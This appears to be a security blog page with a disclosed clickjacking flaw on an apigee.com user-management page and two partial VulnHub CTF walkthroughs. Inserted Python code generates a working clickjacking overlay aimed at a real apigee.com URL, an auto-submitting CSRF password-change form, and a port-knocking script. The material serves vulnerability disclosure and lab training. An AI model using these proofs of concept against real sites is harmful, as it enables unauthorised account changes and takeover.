Posts

Google(Apigee.com) ClickJacking Vulnerability

Hi folks, 

This post is about one of my recent findings in apigee.com, which was acquired by Google in 2016. While monitoring requests and responses, I noticed that the following endpoint was served without an X-Frame-Options response header (and no CSP frame-ancestors directive either), as shown in the image below. Without one of those, any third-party site can load the page in an iframe.

https://apigee.com/platform/<orgnization_name>/users/<user_email>



So I quickly visited the page, and it has an option to remove a user, as shown in the image below.



In this case, an attacker who is already a member of the organization can frame this page on a site they control, overlay a bait button on the "remove" control, and easily trick an administrator into removing other users with a single click.

Working POC:
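As an added example (not the original post's proof of concept, which only survives as a screenshot): a small Python helper that classifies a response's anti-framing headers the way a browser does, plus a generator for the overlay page a clickjacking PoC is built from. The target URL, pixel offsets and bait text are assumptions; the offsets must be measured beforehand in the attacker's own account so the near-invisible "remove" control sits exactly under the bait button.

```python
"""Added example (not the original post's PoC): classify a response's
anti-framing headers and build a clickjacking overlay page.
URLs, pixel offsets and bait text below are assumptions."""
import html
import re


def framing_protection(headers):
    """Return how a browser would treat this response when framed.

    'blocked'    - X-Frame-Options: DENY, or CSP frame-ancestors 'none'
    'sameorigin' - only same-origin framing allowed
    'restricted' - CSP frame-ancestors with an explicit origin list
    'frameable'  - no effective protection (the case described in the post)

    CSP frame-ancestors takes precedence over X-Frame-Options when both are
    present.  Obsolete or invalid X-Frame-Options values (e.g. ALLOW-FROM,
    typos) are not enforced by current browsers, so they count as frameable.
    Header-name lookup is case-insensitive.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    csp = lowered.get("content-security-policy", "")
    match = re.search(r"frame-ancestors\s+([^;]+)", csp, re.I)
    if match:
        sources = match.group(1).strip().lower()
        if sources == "'none'":
            return "blocked"
        if sources == "'self'":
            return "sameorigin"
        return "restricted"
    xfo = lowered.get("x-frame-options", "").strip().lower()
    if xfo == "deny":
        return "blocked"
    if xfo == "sameorigin":
        return "sameorigin"
    return "frameable"


def build_clickjacking_poc(target_url, button_left, button_top,
                           bait_text="Click to continue"):
    """Return an HTML page that frames target_url at near-zero opacity and
    places a visible bait button at the assumed (left, top) position of the
    victim's destructive control.  The iframe sits on top (higher z-index),
    so the victim's click lands on the framed page, not on the bait."""
    url = html.escape(target_url, quote=True)
    return f"""<!doctype html>
<html><head><style>
  iframe {{ position:absolute; top:0; left:0; width:1400px; height:900px;
            opacity:0.01; z-index:2; border:0; }}
  button {{ position:absolute; top:{button_top}px; left:{button_left}px;
            z-index:1; }}
</style></head>
<body>
  <button>{html.escape(bait_text)}</button>
  <iframe src="{url}"></iframe>
</body></html>"""


if __name__ == "__main__":
    # Constructed header sets, not captured traffic.
    print(framing_protection({"Content-Type": "text/html"}))
    print(framing_protection({"X-Frame-Options": "DENY"}))
    print(build_clickjacking_poc(
        "https://apigee.com/platform/example-org/users/victim@example.com",
        410, 320))
```

The fix on the server side is the mirror image of the check: send `X-Frame-Options: DENY` (or `SAMEORIGIN` if the app frames itself) and, for browsers that honour it, `Content-Security-Policy: frame-ancestors 'none'`; once either is present the generated page renders an empty frame and the overlay no longer does anything.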




Response from Google:



Sad story :p 
Thanks for reading ;) 

Quantopian Authentication bypass vulnerability


Snyk privilege escalation vulnerability


Stripe privilege escalation vulnerability


Ldesk XSS Vulnerability


SecOS: 1 Walkthrough

Hi guys, I found another awesome CTF on VulnHub, so let's walk through SecOS.
Nmap:
The nmap result shows two open ports. Let's try to access port 8081.

Looks cool! Let's explore the website, but first open Burp Suite and spider this host so that Burp can capture some directories.

So Burp found a page called hint. Let's visit this page.
As always it shows nothing on the front, so let's check the source code.

We got three hints. After looking at the third hint I quickly went to the signup option, created an account and logged in with it. Digging around, I noticed three important points:
Administrator: Spiderman
Change password option:
Message option:
Now we can understand the hints. They simply say that we have to conduct a CSRF attack against the administrator, i.e. Spiderman: the change-password form has no anti-CSRF token, and the message option lets us send him a link he will visit.
Let's create a form for the CSRF attack. The form should auto-submit, so that as soon as Spiderman visits the page his password is changed.

Save this form to the /var/www directory and start the Apache server. w…
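The auto-submitting form described above, as an added example that is not the walkthrough's own page. The action URL, host and field names are assumptions: take the real ones from the change-password request captured in Burp. Values are escaped so a password containing quotes does not break the markup.

```python
"""Added example, not the walkthrough's own form: generate an auto-submitting
HTML form for a CSRF proof of concept.  Host, path and field names are
assumptions; copy them from the captured change-password request."""
import html


def build_csrf_form(action, fields, method="POST"):
    """Return an HTML page that submits `fields` to `action` on load.

    The victim's browser attaches his session cookie to the cross-site POST,
    so the request is processed as him.  This only works when the target
    checks no anti-CSRF token and the cookie is not explicitly
    SameSite=Lax/Strict (either blocks the cookie on a cross-site POST).
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for n, v in fields.items()
    )
    return f"""<!doctype html>
<html><body onload="document.forms[0].submit()">
  <form method="{method}" action="{html.escape(action, quote=True)}">
{inputs}
  </form>
</body></html>"""


def write_poc(path, page):
    """Write the page where the web server will serve it (e.g. under /var/www)."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(page)
    return path


if __name__ == "__main__":
    # Assumed target and field names; the real ones come from Burp.
    page = build_csrf_form(
        "http://192.168.56.101:8081/change-password",
        {"username": "spiderman", "password": "pwned123", "confirm": "pwned123"},
    )
    print(page)
```

Send Spiderman the URL of the saved page through the message option; when his browser loads it, the form posts with his cookie and you can log in as him with the new password.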

Lord of the root CTF walkthrough

Hi guys, today we will walk through the Lord of the Root CTF challenge. You can find this interesting challenge here. As stated by the author, our goal is to root the box and find the flag.txt file, so let's start ;)
As always our first task is thorough enumeration, so let's start with nmap to check which services and ports are running on the target machine.

Nmap shows that only port 22 is open. Let's connect to it and see if we get any hint to move further.

Basically, the SSH banner gives us a hint to port-knock on ports 1, 2 and 3. There are many ways to port-knock, but we will use the following simple shell script.

Let's run this script against our target IP and the three ports.
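The author's shell script is not reproduced on the page. As an added example (not the author's script), here is the same knock sequence in Python, followed by a probe of the port that the knock is expected to open. The target IP is an assumption; the ports 1, 2, 3 and the result port 1337 come from the walkthrough. A single SYN per port is enough, because a knock daemon watches packets rather than completed connections, so a refused or timed-out connect still counts as a knock. A constructed simulated knock daemon is included so the logic can be exercised offline.

```python
"""Added example, not the author's shell script: send a port-knock sequence
and check whether the protected port opened.  Target IP is an assumption."""
import socket

KNOCK_SEQUENCE = [1, 2, 3]   # from the SSH banner hint in the walkthrough
PROTECTED_PORT = 1337        # the port that appeared after knocking


def tcp_touch(host, port, timeout=0.5):
    """Send one TCP connect attempt (a SYN).  Returns True only if the
    connection was accepted; refused/filtered ports return False, which is
    fine for knocking because the daemon only needs to see the SYN."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def knock(host, ports, touch=tcp_touch):
    """Knock each port in order.  Returns [(port, accepted), ...] so the
    exact sequence that was sent can be inspected."""
    return [(port, touch(host, port)) for port in ports]


def knock_and_probe(host, sequence, target_port, touch=tcp_touch):
    """Send the knock sequence, then probe target_port; True if it is open."""
    knock(host, sequence, touch)
    return touch(host, target_port)


class SimulatedKnockd:
    """Constructed stand-in for a knock daemon, used for offline testing:
    opens PROTECTED_PORT only after the last three knocks were 1, 2, 3
    in that order, mirroring how knockd matches a sequence."""

    def __init__(self, sequence=tuple(KNOCK_SEQUENCE), protected=PROTECTED_PORT):
        self.sequence = list(sequence)
        self.protected = protected
        self.seen = []
        self.opened = False

    def __call__(self, host, port, timeout=0.5):
        if port == self.protected:
            return self.opened
        self.seen.append(port)
        if self.seen[-len(self.sequence):] == self.sequence:
            self.opened = True
        return False


if __name__ == "__main__":
    target = "192.168.56.102"   # assumed lab IP
    print(knock(target, KNOCK_SEQUENCE))
    print("port", PROTECTED_PORT, "open:",
          tcp_touch(target, PROTECTED_PORT))
```

Against a real target, run the knock and then rescan with nmap; if the sequence was accepted, port 1337 shows up as open. Order matters and the daemon usually expects the knocks within a few seconds, which is why the sequence is sent in one loop without delays.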

After that, let's run nmap again and check for open ports.

As a result of port knocking we got another open port, port 1337. Sounds good? Let's access it.

Now let's run nikto to get some juicy information about the target.

But unfortunately nikto shows nothing important. Next I checked the source code for further hi…